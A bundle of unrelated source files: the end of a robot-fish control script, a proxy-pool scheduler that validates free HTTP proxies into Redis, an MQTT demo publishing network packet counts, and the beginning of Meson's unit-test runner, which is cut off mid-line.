GPIO.cleanup() def log_status(t_passed, depth_mm): """Logs the overall status of BlueBot """ with open('./data/{}/{}_status.log'.format(U_FILENAME, U_UUID), 'a') as f: f.write('{:.2f},{}\n'.format(t_passed, depth_mm)) def depth_ctrl_from_cam(target): """Controls the diving depth to stay level with an observed object using both cameras. Swithes to depth sensor based depth control when on level with object. 
The "pitch" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(p^2 + q^2)). A positive angle switches the dorsal fin on to move down. A negative angles switches the dorsal fin off to move up. Returns: (): Floats to the surface if no object observed """ if not target.size: dorsal.off() return pitch_range = 2 # abs(pitch) below which dorsal fin is not controlled pitch = np.arctan2(target[2], sqrt(target[0]**2 + target[1]**2)) * 180 / pi if pitch > pitch_range: dorsal.on() elif pitch < -pitch_range: dorsal.off() def center(sign): right = vision.pqr_r left = vision.pqr_l # compute center if right.size and left.size: center = sign/(right.shape[1] + left.shape[1]) * (np.sum(right, axis=1) + np.sum(left, axis=1)) return center elif right.size: center = sign/right.shape[1] * np.sum(right, axis=1) return center elif left.size: center = sign/left.shape[1] * np.sum(left, axis=1) return center else: return np.zeros(0) def home(target): """Controls the pectoral fins to follow an object using both cameras The "heading" angle towards an object is calculated based on (pqr) coordinates as follows: atan2(r, sqrt(q^2 + p^2)). A positive angle switches the pectoral left fin on turn clockwise. A negative angles switches the pectoral right fin on to turn counterclockwise. 
Returns: (): Floats to the surface and turns on the spot if no object observed """ caudal_range = 50 # abs(heading) below which caudal fin is switched on # blob behind or lost if not target.size: #print('cant see blob') pecto_r.set_frequency(6) pecto_r.on() pecto_l.off() caudal.off() return # calculate heading heading = np.arctan2(target[1], target[0]) * 180 / pi # target to the right if heading > 0: freq_l = 5 + 5 * abs(heading) / 180 pecto_l.set_frequency(freq_l) #print('turn cw') pecto_l.on() pecto_r.off() if heading < caudal_range: caudal.on() else: caudal.off() # target to the left elif heading < 0: freq_r = 5 + 5 * abs(heading) / 180 pecto_r.set_frequency(freq_r) #print('turn ccw') pecto_r.on() pecto_l.off() if heading > -caudal_range: caudal.on() else: caudal.off() def main(run_time=60): iteration = 0 t_start = time.time() while time.time() - t_start < run_time: try: vision.update() except: continue ''' # SAVE IMAGES temp = Image.fromarray(vision._cam_r.img) temp.save('./data/{}/imgs_r/img_r_{}.png'.format(U_FILENAME,iteration)) temp = Image.fromarray(vision._cam_l.img) temp.save('./data/{}/imgs_l/img_l_{}.png'.format(U_FILENAME,iteration)) iteration += 1 ''' time_passed = time.time() - t_start if (time_passed < run_time/4) or (1/2*run_time <= time_passed < 3/4*run_time): sign = -1 else: sign = 1 target = center(sign) home(target) depth_ctrl_from_cam(target) depth_sensor.update() depth_mm = max(0, (depth_sensor.pressure_mbar - surface_pressure) * 10.197162129779) log_status(time_passed, depth_mm) max_centroids = 3 # maximum expected centroids in environment caudal = Fin(U_FIN_C1, U_FIN_C2, 3) # freq, [Hz] dorsal = Fin(U_FIN_D1, U_FIN_D2, 5) # freq, [Hz] pecto_r = Fin(U_FIN_PR1, U_FIN_PR2, 8) # freq, [Hz] pecto_l = Fin(U_FIN_PL1, U_FIN_PL2, 8) # freq, [Hz] photodiode = Photodiode() leds = LEDS() vision = Vision(max_centroids, True) vision._cam_r.colorbot_settings() vision._cam_l.colorbot_settings() depth_sensor = DepthSensor() depth_sensor.update() 
surface_pressure = depth_sensor.pressure_mbar initialize() idle() main(80) # run time terminate()
schedule.py
import time
from multiprocessing import Process
import asyncio
import aiohttp
# aiohttp renamed/moved its exception classes between releases; fall back to
# the newer names so both old and new library versions are supported.
try:
    from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
except:
    from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError


class ValidityTester(object):
    """Tests raw proxies for usability and stores the valid ones in Redis."""

    # Probe URL used to check each proxy (from proxypool.setting).
    test_api = TEST_API

    def __init__(self):
        self._raw_proxies = None
        self._usable_proxies = []

    def set_raw_proxies(self, proxies):
        """Load the batch of proxies to be checked by the next test() call."""
        self._raw_proxies = proxies
        # Fresh Redis connection per batch; valid proxies are pushed here.
        self._conn = RedisClient()

    async def test_single_proxy(self, proxy):
        """
        Test one proxy; if it fetches ``test_api`` with HTTP 200, put it
        into the usable pool in Redis.
        """
        try:
            async with aiohttp.ClientSession() as session:
                try:
                    if isinstance(proxy, bytes):
                        proxy = proxy.decode('utf-8')
                    real_proxy = 'http://' + proxy
                    print('Testing', proxy)
                    async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response:
                        if response.status == 200:
                            self._conn.put(proxy)
                            print('Valid proxy', proxy)
                except (ProxyConnectionError, TimeoutError, ValueError):
                    print('Invalid proxy', proxy)
        except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s:
            print(s)
            pass

    def test(self):
        """
        Test all loaded proxies concurrently on the asyncio event loop.
        """
        print('ValidityTester is working')
        try:
            loop = asyncio.get_event_loop()
            tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
            loop.run_until_complete(asyncio.wait(tasks))
        except ValueError:
            # asyncio.wait() raises ValueError when the task list is empty.
            print('Async Error')


class PoolAdder(object):
    """
    Crawls free-proxy sources and adds validated proxies to the pool until
    it holds at least ``threshold`` entries.
    """

    def __init__(self, threshold):
        # Target pool size; add_to_queue() stops once this is reached.
        self._threshold = threshold
        self._conn = RedisClient()
        self._tester = ValidityTester()
        self._crawler = FreeProxyGetter()

    def is_over_threshold(self):
        """
        Return True when the pool already holds at least ``threshold`` proxies.
        """
        if self._conn.queue_len >= self._threshold:
            return True
        else:
            return False

    def add_to_queue(self):
        """Crawl every registered source and validate the results, stopping
        once the pool is full; raise ResourceDepletionError if no source
        yielded any proxy at all."""
        print('PoolAdder is working')
        proxy_count = 0
        while not self.is_over_threshold():
            # Iterate over every crawl function registered on the getter.
            for callback_label in range(self._crawler.__CrawlFuncCount__):
                callback = self._crawler.__CrawlFunc__[callback_label]
                raw_proxies = self._crawler.get_raw_proxies(callback)
                # test crawled proxies
                self._tester.set_raw_proxies(raw_proxies)
                self._tester.test()
                proxy_count += len(raw_proxies)
                if self.is_over_threshold():
                    print('IP is enough, waiting to be used')
                    break
            if proxy_count == 0:
                # Every source came back empty: no proxies can be obtained.
                raise ResourceDepletionError


class Schedule(object):
    """Drives the two background maintenance jobs of the proxy pool."""

    @staticmethod
    def valid_proxy(cycle=VALID_CHECK_CYCLE):
        """
        Periodically re-test half of the proxies currently held in Redis.
        """
        conn = RedisClient()
        tester = ValidityTester()
        while True:
            print('Refreshing ip')
            count = int(0.5 * conn.queue_len)
            if count == 0:
                print('Waiting for adding')
                time.sleep(cycle)
                continue
            raw_proxies = conn.get(count)
            tester.set_raw_proxies(raw_proxies)
            tester.test()
            time.sleep(cycle)

    @staticmethod
    def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
                   upper_threshold=POOL_UPPER_THRESHOLD,
                   cycle=POOL_LEN_CHECK_CYCLE):
        """
        If the number of proxies drops below lower_threshold, refill the
        pool up to upper_threshold.
        """
        conn = RedisClient()
        adder = PoolAdder(upper_threshold)
        while True:
            if conn.queue_len < lower_threshold:
                adder.add_to_queue()
            time.sleep(cycle)

    def run(self):
        """Start both maintenance jobs, each in its own process."""
        print('Ip processing running')
        valid_process = Process(target=Schedule.valid_proxy)
        check_process = Process(target=Schedule.check_pool)
        valid_process.start()
        check_process.start()
main.py
#!/usr/bin/python import paho.mqtt.client as paho import psutil import signal import sys import time from threading import Thread def interruptHandler(signal, frame): sys.exit(0) def on_publish(mosq, obj, msg): pass def dataNetwork(): netdata = psutil.net_io_counters() return netdata.packets_sent + netdata.packets_recv def dataNetworkHandler(): idDevice = "90:b6:86:05:e7:d1" mqttclient = paho.Client() mqttclient.on_publish = on_publish mqttclient.connect("test.mosquitto.org", 1883, 60) while True: packets = dataNetwork() message = idDevice + " " + str(packets) print "MQTT dataNetworkHandler " + message mqttclient.publish("IoT101/Network", message) time.sleep(1) if __name__ == '__main__': signal.signal(signal.SIGINT, interruptHandler) threadx = Thread(target=dataNetworkHandler) threadx.start() while True: print "Richo Hello Internet of Things 101" time.sleep(5) # End of File
run_unittests.py
#!/usr/bin/env python3

# Copyright 2016-2017 The Meson development team

# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at

#     http://www.apache.org/licenses/LICENSE-2.0

# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import time
import stat
import subprocess
import re
import json
import tempfile
import textwrap
import os
import shutil
import sys
import unittest
import platform
import pickle
import functools
import io
import operator
import threading
import zipfile
import hashlib
from itertools import chain
from unittest import mock
from configparser import ConfigParser
from contextlib import contextmanager
from glob import glob
from pathlib import (PurePath, Path)
from distutils.dir_util import copy_tree
import typing as T

import mesonbuild.mlog
import mesonbuild.depfile
import mesonbuild.dependencies.base
import mesonbuild.compilers
import mesonbuild.envconfig
import mesonbuild.environment
import mesonbuild.mesonlib
import mesonbuild.coredata
import mesonbuild.modules.gnome
from mesonbuild.interpreter import Interpreter, ObjectHolder
from mesonbuild.ast import AstInterpreter
from mesonbuild.mesonlib import (
    BuildDirLock, LibType, MachineChoice, PerMachine, Version, is_windows,
    is_osx, is_cygwin, is_dragonflybsd, is_openbsd, is_haiku, is_sunos,
    windows_proof_rmtree, python_command, version_compare, split_args, quote_arg,
    relpath, is_linux, git, GIT
)
from mesonbuild.environment import detect_ninja
from mesonbuild.mesonlib import MesonException, EnvironmentException, OptionKey
from mesonbuild.dependencies import PkgConfigDependency, ExternalProgram
import mesonbuild.dependencies.base
from mesonbuild.build import Target, ConfigurationData
import mesonbuild.modules.pkgconfig
from mesonbuild.mtest import TAPParser, TestResult
from mesonbuild.wrap.wrap import PackageDefinition, WrapException

from run_tests import (
    Backend, FakeBuild, FakeCompilerOptions,
    ensure_backend_detects_changes, exe_suffix, get_backend_commands,
    get_builddir_target_args, get_fake_env, get_fake_options, get_meson_script,
    run_configure_inprocess, run_mtest_inprocess
)

if T.TYPE_CHECKING:
    from mesonbuild.compilers import Compiler

URLOPEN_TIMEOUT = 5

@contextmanager
def chdir(path: str):
    """Context manager: temporarily change the working directory to *path*,
    restoring the original directory on exit (even if the body raises)."""
    curdir = os.getcwd()
    os.chdir(path)
    try:
        yield
    finally:
        os.chdir(curdir)

def get_dynamic_section_entry(fname: str, entry: str) -> T.Optional[str]:
    """Return the value of *entry* from the ELF dynamic section of *fname*
    (as reported by ``readelf -d``), or None if the entry is absent.

    Skips the calling test on non-ELF platforms or when readelf is missing.
    """
    if is_cygwin() or is_osx():
        raise unittest.SkipTest('Test only applicable to ELF platforms')

    try:
        raw_out = subprocess.check_output(['readelf', '-d', fname],
                                          universal_newlines=True)
    except FileNotFoundError:
        # FIXME: Try using depfixer.py:Elf() as a fallback
        raise unittest.SkipTest('readelf not found')
    pattern = re.compile(entry + r': \[(.*?)\]')
    for line in raw_out.split('\n'):
        m = pattern.search(line)
        if m is not None:
            return str(m.group(1))
    return None # The file did not contain the specified entry.
def get_soname(fname: str) -> T.Optional[str]:
    '''Return the SONAME recorded in the ELF file *fname*, or None.'''
    return get_dynamic_section_entry(fname, 'soname')

def get_rpath(fname: str) -> T.Optional[str]:
    '''
    Return the RPATH/RUNPATH of the ELF file *fname* as a colon-separated
    string, with Nix store paths filtered out; None if the file has neither
    entry or it is empty.
    '''
    raw = get_dynamic_section_entry(fname, r'(?:rpath|runpath)')
    # Get both '' and None here
    if not raw:
        return None
    # nix/nixos adds a bunch of stuff to the rpath out of necessity that we
    # don't check for, so clear those
    final = ':'.join([e for e in raw.split(':') if not e.startswith('/nix')])
    return final

def is_tarball():
    '''Heuristic: a tarball layout has no docs/ directory next to us.'''
    if not os.path.isdir('docs'):
        return True
    return False

def is_ci():
    '''True when running under CI (the CI environment variable is set).'''
    if 'CI' in os.environ:
        return True
    return False

def _git_init(project_dir):
    '''
    Initialize *project_dir* as a git repository with one commit containing
    all files, using a fixed author identity so tests are reproducible.
    '''
    # If a user has git configuration init.defaultBranch set we want to override that
    with tempfile.TemporaryDirectory() as d:
        out = git(['--version'], str(d))[1]
    if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
        extra_cmd = ['--initial-branch', 'master']
    else:
        extra_cmd = []

    subprocess.check_call(['git', 'init'] + extra_cmd, cwd=project_dir, stdout=subprocess.DEVNULL)
    subprocess.check_call(['git', 'config',
                           'user.name', 'Author Person'], cwd=project_dir)
    subprocess.check_call(['git', 'config',
                           'user.email', 'teh_coderz@example.com'], cwd=project_dir)
    # shell=True so the glob is expanded by the shell; paths here are
    # test-controlled, not untrusted input.
    subprocess.check_call('git add *', cwd=project_dir, shell=True,
                          stdout=subprocess.DEVNULL)
    subprocess.check_call(['git', 'commit', '-a', '-m', 'I am a project'], cwd=project_dir,
                          stdout=subprocess.DEVNULL)

@functools.lru_cache()
def is_real_gnu_compiler(path):
    '''
    Check if the gcc we have is a real gcc and not a macOS wrapper around clang
    '''
    if not path:
        return False
    out = subprocess.check_output([path, '--version'], universal_newlines=True, stderr=subprocess.STDOUT)
    return 'Free Software Foundation' in out

def skipIfNoExecutable(exename):
    '''
    Skip this test if the given executable is not found.
    '''
    def wrapper(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            if shutil.which(exename) is None:
                raise unittest.SkipTest(exename + ' not found')
            return func(*args, **kwargs)
        return wrapped
    return wrapper

def skipIfNoPkgconfig(f):
    '''
    Skip this test if no pkg-config is found, unless we're on CI.
    This allows users to run our test suite without having pkg-config
    installed on, f.ex., macOS, while ensuring that our CI does not
    silently skip the test because of misconfiguration.

    Note: Yes, we provide pkg-config even while running Windows CI
    '''
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        if not is_ci() and shutil.which('pkg-config') is None:
            raise unittest.SkipTest('pkg-config not found')
        return f(*args, **kwargs)
    return wrapped

def skipIfNoPkgconfigDep(depname):
    '''
    Skip this test if the given pkg-config dep is not found, unless we're on CI.
    '''
    def wrapper(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            if not is_ci() and shutil.which('pkg-config') is None:
                raise unittest.SkipTest('pkg-config not found')
            if not is_ci() and subprocess.call(['pkg-config', '--exists', depname]) != 0:
                raise unittest.SkipTest('pkg-config dependency {} not found.'.format(depname))
            return func(*args, **kwargs)
        return wrapped
    return wrapper

def skip_if_no_cmake(f):
    '''
    Skip this test if no cmake is found, unless we're on CI.
    This allows users to run our test suite without having cmake
    installed on, f.ex., macOS, while ensuring that our CI does not
    silently skip the test because of misconfiguration.
    '''
    @functools.wraps(f)
    def wrapped(*args, **kwargs):
        if not is_ci() and shutil.which('cmake') is None:
            raise unittest.SkipTest('cmake not found')
        return f(*args, **kwargs)
    return wrapped

def skip_if_not_language(lang):
    '''Skip the decorated test when no compiler for *lang* can be detected.'''
    def wrapper(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            try:
                env = get_fake_env()
                f = getattr(env, 'detect_{}_compiler'.format(lang))
                f(MachineChoice.HOST)
            except EnvironmentException:
                raise unittest.SkipTest('No {} compiler found.'.format(lang))
            return func(*args, **kwargs)
        return wrapped
    return wrapper

def skip_if_env_set(key):
    '''
    Skip a test if a particular env is set, except when running under CI
    (on CI the variable is temporarily popped for the duration of the test
    and restored afterwards).
    '''
    def wrapper(func):
        @functools.wraps(func)
        def wrapped(*args, **kwargs):
            old = None
            if key in os.environ:
                if not is_ci():
                    raise unittest.SkipTest('Env var {!r} set, skipping'.format(key))
                old = os.environ.pop(key)
            try:
                return func(*args, **kwargs)
            finally:
                # Restore the variable even if the test raised.
                if old is not None:
                    os.environ[key] = old
        return wrapped
    return wrapper

def skip_if_not_base_option(feature):
    """Skip tests if the compiler does not support a given base option.

    For example, ICC doesn't currently support b_sanitize.
    """
    def actual(f):
        @functools.wraps(f)
        def wrapped(*args, **kwargs):
            env = get_fake_env()
            cc = env.detect_c_compiler(MachineChoice.HOST)
            key = OptionKey(feature)
            if key not in cc.base_options:
                raise unittest.SkipTest(
                    '{} not available with {}'.format(feature, cc.id))
            return f(*args, **kwargs)
        return wrapped
    return actual

@contextmanager
def temp_filename():
    '''A context manager which provides a filename to an empty temporary file.

    On exit the file will be deleted.
    '''

    fd, filename = tempfile.mkstemp()
    # Close our fd immediately; callers open the file by name themselves.
    os.close(fd)
    try:
        yield filename
    finally:
        try:
            os.remove(filename)
        except OSError:
            # Best-effort cleanup: the test may already have removed it.
            pass

@contextmanager
def no_pkgconfig():
    '''
    A context manager that overrides shutil.which and ExternalProgram to force
    them to return None for pkg-config to simulate it not existing.
''' old_which = shutil.which old_search = ExternalProgram._search def new_search(self, name, search_dir): if name == 'pkg-config': return [None] return old_search(self, name, search_dir) def new_which(cmd, *kwargs): if cmd == 'pkg-config': return None return old_which(cmd, *kwargs) shutil.which = new_which ExternalProgram._search = new_search try: yield finally: shutil.which = old_which ExternalProgram._search = old_search class InternalTests(unittest.TestCase): def test_version_number(self): searchfunc = mesonbuild.environment.search_version self.assertEqual(searchfunc('foobar 1.2.3'), '1.2.3') self.assertEqual(searchfunc('1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.10.28 1.2.3'), '1.2.3') self.assertEqual(searchfunc('foobar 2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10.128'), '2016.10.128') self.assertEqual(searchfunc('2016.10'), '2016.10') self.assertEqual(searchfunc('2016.10 1.2.3'), '1.2.3') self.assertEqual(searchfunc('oops v1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.oops 1.2.3'), '1.2.3') self.assertEqual(searchfunc('2016.x'), 'unknown version') def test_mode_symbolic_to_bits(self): modefunc = mesonbuild.mesonlib.FileMode.perms_s_to_bits self.assertEqual(modefunc('---------'), 0) self.assertEqual(modefunc('r--------'), stat.S_IRUSR) self.assertEqual(modefunc('---r-----'), stat.S_IRGRP) self.assertEqual(modefunc('------r--'), stat.S_IROTH) self.assertEqual(modefunc('-w-------'), stat.S_IWUSR) self.assertEqual(modefunc('----w----'), stat.S_IWGRP) self.assertEqual(modefunc('-------w-'), stat.S_IWOTH) self.assertEqual(modefunc('--x------'), stat.S_IXUSR) self.assertEqual(modefunc('-----x---'), stat.S_IXGRP) self.assertEqual(modefunc('--------x'), stat.S_IXOTH) self.assertEqual(modefunc('--S------'), stat.S_ISUID) self.assertEqual(modefunc('-----S---'), stat.S_ISGID) self.assertEqual(modefunc('--------T'), stat.S_ISVTX) self.assertEqual(modefunc('--s------'), 
stat.S_ISUID | stat.S_IXUSR) self.assertEqual(modefunc('-----s---'), stat.S_ISGID | stat.S_IXGRP) self.assertEqual(modefunc('--------t'), stat.S_ISVTX | stat.S_IXOTH) self.assertEqual(modefunc('rwx------'), stat.S_IRWXU) self.assertEqual(modefunc('---rwx---'), stat.S_IRWXG) self.assertEqual(modefunc('------rwx'), stat.S_IRWXO) # We could keep listing combinations exhaustively but that seems # tedious and pointless. Just test a few more. self.assertEqual(modefunc('rwxr-xr-x'), stat.S_IRWXU | stat.S_IRGRP | stat.S_IXGRP | stat.S_IROTH | stat.S_IXOTH) self.assertEqual(modefunc('rw-r--r--'), stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IROTH) self.assertEqual(modefunc('rwsr-x---'), stat.S_IRWXU | stat.S_ISUID | stat.S_IRGRP | stat.S_IXGRP) def test_compiler_args_class_none_flush(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, mock.Mock()) a = cc.compiler_args(['-I.']) #first we are checking if the tree construction deduplicates the correct -I argument a += ['-I..'] a += ['-I./tests/'] a += ['-I./tests2/'] #think this here as assertion, we cannot apply it, otherwise the CompilerArgs would already flush the changes: # assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..', '-I.']) a += ['-I.'] a += ['-I.', '-I./tests/'] self.assertEqual(a, ['-I.', '-I./tests/', '-I./tests2/', '-I..']) #then we are checking that when CompilerArgs already have a build container list, that the deduplication is taking the correct one a += ['-I.', '-I./tests2/'] self.assertEqual(a, ['-I.', '-I./tests2/', '-I./tests/', '-I..']) def test_compiler_args_class_d(self): d = mesonbuild.compilers.DmdDCompiler([], 'fake', MachineChoice.HOST, 'info', 'arch') # check include order is kept when deduplicating a = d.compiler_args(['-Ifirst', '-Isecond', '-Ithird']) a += ['-Ifirst'] self.assertEqual(a, ['-Ifirst', '-Isecond', '-Ithird']) def test_compiler_args_class_clike(self): cc = mesonbuild.compilers.ClangCCompiler([], 'fake', MachineChoice.HOST, False, 
mock.Mock()) # Test that empty initialization works a = cc.compiler_args() self.assertEqual(a, []) # Test that list initialization works a = cc.compiler_args(['-I.', '-I..']) self.assertEqual(a, ['-I.', '-I..']) # Test that there is no de-dup on initialization self.assertEqual(cc.compiler_args(['-I.', '-I.']), ['-I.', '-I.']) ## Test that appending works a.append('-I..') self.assertEqual(a, ['-I..', '-I.']) a.append('-O3') self.assertEqual(a, ['-I..', '-I.', '-O3']) ## Test that in-place addition works a += ['-O2', '-O2'] self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2', '-O2']) # Test that removal works a.remove('-O2') self.assertEqual(a, ['-I..', '-I.', '-O3', '-O2']) # Test that de-dup happens on addition a += ['-Ifoo', '-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # .extend() is just +=, so we don't test it ## Test that addition works # Test that adding a list with just one old arg works and yields the same array a = a + ['-Ifoo'] self.assertEqual(a, ['-Ifoo', '-I..', '-I.', '-O3', '-O2']) # Test that adding a list with one arg new and one old works a = a + ['-Ifoo', '-Ibaz'] self.assertEqual(a, ['-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2']) # Test that adding args that must be prepended and appended works a = a + ['-Ibar', '-Wall'] self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) ## Test that reflected addition works # Test that adding to a list with just one old arg works and yields the same array a = ['-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-O3', '-O2', '-Wall']) # Test that adding to a list with just one new arg that is not pre-pended works a = ['-Werror'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Werror', '-O3', '-O2', '-Wall']) # Test that adding to a list with two new args preserves the order a = ['-Ldir', '-Lbah'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', 
'-Wall']) # Test that adding to a list with old args does nothing a = ['-Ibar', '-Ibaz', '-Ifoo'] + a self.assertEqual(a, ['-Ibar', '-Ifoo', '-Ibaz', '-I..', '-I.', '-Ldir', '-Lbah', '-Werror', '-O3', '-O2', '-Wall']) ## Test that adding libraries works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Adding a library and a libpath appends both correctly l += ['-Lbardir', '-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) # Adding the same library again does nothing l += ['-lbar'] self.assertEqual(l, ['-Lbardir', '-Lfoodir', '-lfoo', '-lbar']) ## Test that 'direct' append and extend works l = cc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l, ['-Lfoodir', '-lfoo']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l, ['-Lfoodir', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a']) def test_compiler_args_class_gnuld(self): ## Test --start/end-group linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', 
'-Wl,--end-group']) # Direct-adding a library and a libpath appends both correctly l.extend_direct(['-Lbardir', '-lbar']) self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-Wl,--end-group']) # Direct-adding the same library again still adds it l.append_direct('-lbar') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '-Wl,--end-group']) # Direct-adding with absolute path deduplicates l.append_direct('/libbaz.a') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding libbaz again does nothing l.append_direct('/libbaz.a') self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group']) # Adding a non-library argument doesn't include it in the group l += ['-Lfoo', '-Wl,--export-dynamic'] self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--end-group', '-Wl,--export-dynamic']) # -Wl,-lfoo is detected as a library and gets added to the group l.append('-Wl,-ldl') self.assertEqual(l.to_native(copy=True), ['-Lfoo', '-Lfoodir', '-Wl,--start-group', '-lfoo', '-Lbardir', '-lbar', '-lbar', '/libbaz.a', '-Wl,--export-dynamic', '-Wl,-ldl', '-Wl,--end-group']) def test_compiler_args_remove_system(self): ## Test --start/end-group linker = mesonbuild.linkers.GnuBFDDynamicLinker([], MachineChoice.HOST, '-Wl,', []) gcc = mesonbuild.compilers.GnuCCompiler([], 'fake', False, MachineChoice.HOST, mock.Mock(), linker=linker) ## Ensure that the fake compiler is never called by overriding the relevant function gcc.get_default_include_dirs = lambda: ['/usr/include', '/usr/share/include', '/usr/local/include'] ## Test that 'direct' append and extend works l = gcc.compiler_args(['-Lfoodir', '-lfoo']) 
self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group']) ## Test that to_native removes all system includes l += ['-isystem/usr/include', '-isystem=/usr/share/include', '-DSOMETHING_IMPORTANT=1', '-isystem', '/usr/local/include'] self.assertEqual(l.to_native(copy=True), ['-Lfoodir', '-Wl,--start-group', '-lfoo', '-Wl,--end-group', '-DSOMETHING_IMPORTANT=1']) def test_string_templates_substitution(self): dictfunc = mesonbuild.mesonlib.get_filenames_templates_dict substfunc = mesonbuild.mesonlib.substitute_values ME = mesonbuild.mesonlib.MesonException # Identity self.assertEqual(dictfunc([], []), {}) # One input, no outputs inputs = ['bar/foo.c.in'] outputs = [] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + cmd[1:]) cmd = ['@INPUT0@.out', '@PLAINNAME@.ok', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + [d['@PLAINNAME@'] + '.ok'] + cmd[2:]) cmd = ['@INPUT@', '@BASENAME@.hah', 'strings'] self.assertEqual(substfunc(cmd, d), inputs + [d['@BASENAME@'] + '.hah'] + cmd[2:]) cmd = ['@OUTPUT@'] self.assertRaises(ME, substfunc, cmd, d) # One input, one output inputs = ['bar/foo.c.in'] outputs = ['out.c'] ret = dictfunc(inputs, outputs) d = {'@INPUT@': inputs, '@INPUT0@': inputs[0], '@PLAINNAME@': 'foo.c.in', '@BASENAME@': 'foo.c', '@OUTPUT@': outputs, '@OUTPUT0@': outputs[0], '@OUTDIR@': '.'} # Check dictionary self.assertEqual(ret, d) # Check substitutions cmd = ['some', 'ordinary', 'strings'] self.assertEqual(substfunc(cmd, d), cmd) cmd = ['@INPUT@.out', '@OUTPUT@', 'strings'] self.assertEqual(substfunc(cmd, d), [inputs[0] + '.out'] + outputs + cmd[2:]) cmd = ['@INPUT0@.out', 
